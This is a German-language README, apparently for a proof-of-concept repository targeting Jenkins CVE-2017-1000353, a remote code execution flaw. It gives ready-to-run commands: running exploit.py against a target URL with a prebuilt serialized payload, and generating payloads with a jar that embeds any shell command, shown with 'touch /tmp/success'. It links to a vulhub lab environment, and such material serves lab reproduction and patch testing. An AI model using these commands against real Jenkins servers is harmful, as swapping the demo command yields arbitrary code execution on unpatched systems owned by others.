
jenkins CVE-2017-1000353 POC
Wie reproduziert man die Jenkins CVE-2017-1000353?
Klonen Sie dieses Repository und verwenden Sie das vorgefertigte Payload jenkins_poc.ser mit folgendem Befehl:
python exploit.py http://your-ip:8080 jenkins_poc.ser
Dann wird der Befehl touch /tmp/success ausgeführt.
Wichtig: Die Payload-Generierung ist abhängig von der Java-Version. Sie wurde erfolgreich mit openjdk:8u292 getestet. Andere Java-Versionen funktionieren möglicherweise nicht korrekt für die Payload-Generierung und Ausnutzung.
jenkins_poc.ser?Laden Sie CVE-2017-1000353-SNAPSHOT-all.jar herunter.
java -jar CVE-2017-1000353-SNAPSHOT-all.jar jenkins_poc.ser "touch /tmp/success"
Wenn Sie Docker verwenden, können Sie den folgenden Befehl nutzen, um die Kompatibilität sicherzustellen:
docker run --rm -v $(pwd):/work -w /work openjdk:8u292 java -jar CVE-2017-1000353-SNAPSHOT-all.jar jenkins_poc.ser "touch /tmp/success"
https://github.com/vulhub/vulhub/tree/master/jenkins/CVE-2017-1000353